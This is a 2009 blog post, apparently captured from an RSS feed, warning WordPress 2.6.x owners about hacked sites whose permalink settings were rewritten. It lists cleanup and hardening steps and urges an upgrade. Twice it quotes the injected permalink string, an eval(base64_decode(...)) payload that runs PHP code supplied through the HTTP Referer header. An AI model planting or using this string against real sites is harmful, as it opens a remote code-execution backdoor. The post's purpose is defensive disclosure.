permalink problem – Andrew Wee | Blogging | Affiliate Marketing | Social Traffic Generation | Internet Marketing http://whoisandrewwee.com BizExcellerated Internet Marketing: Achieve mastery in blogging, affiliate marketing, social traffic generation at Andrew Wee Fri, 04 Sep 2009 23:19:16 +0000 en-US hourly 1 https://wordpress.org/?v=5.8.9 2006-2007 andreww38@gmail.com (Andrew Wee | Blogging | Affiliate Marketing | Social Traffic Generation | Internet Marketing) andreww38@gmail.com (Andrew Wee | Blogging | Affiliate Marketing | Social Traffic Generation | Internet Marketing) 1440 http://www.whoisandrewwee.com/wp-content/plugins/podpress/images/powered_by_podpress.jpg Andrew Wee | Blogging | Affiliate Marketing | Social Traffic Generation | Internet Marketing http://whoisandrewwee.com 144 144 BizExcellerated Internet Marketing: Achieve mastery in blogging, affiliate marketing, social traffic generation Andrew Wee | Blogging | Affiliate Marketing | Social Traffic Generation | Internet Marketing Andrew Wee | Blogging | Affiliate Marketing | Social Traffic Generation | Internet Marketing andreww38@gmail.com no no URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps http://whoisandrewwee.com/blogging/wordpress-26-permalink-problem/ http://whoisandrewwee.com/blogging/wordpress-26-permalink-problem/#comments Fri, 04 Sep 2009 23:00:40 +0000 http://www.whoisandrewwee.com/?p=832 I checked my blog and the URLs looked malformed, with the following structure: http://www.whoisandrewwee.com/2009/09/03/unlocking-unconventional-traffic-sources-for-affiliate-campaigns/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929

If you notice something similar or weird with your WordPress blog, you might want to take the following steps:

  • Check the “users” tab from the WP admin interface
  • Remove any unfamiliar users, esp those marked as “administrator”
  • To prevent users from registering, I’d go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)
  • Check all of WordPress’ PHP scripts, remove global “execute” privileges

Once you’ve secured the perimeter, look at the “Settings” and “permalinks” tab.

If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929”, you’d want to clear that, and replace it with your original permalink structure, or look it up on the WordPress codex.

You can also check out this other blog post for more details.

Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.

UPDATE: Matt Mullenweg from the WordPress development team has posted about the security issues if you’re using an older version of WordPress. Here’s a WP support forum write up about what might be happening.

You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.

]]>
http://whoisandrewwee.com/blogging/wordpress-26-permalink-problem/feed/ 35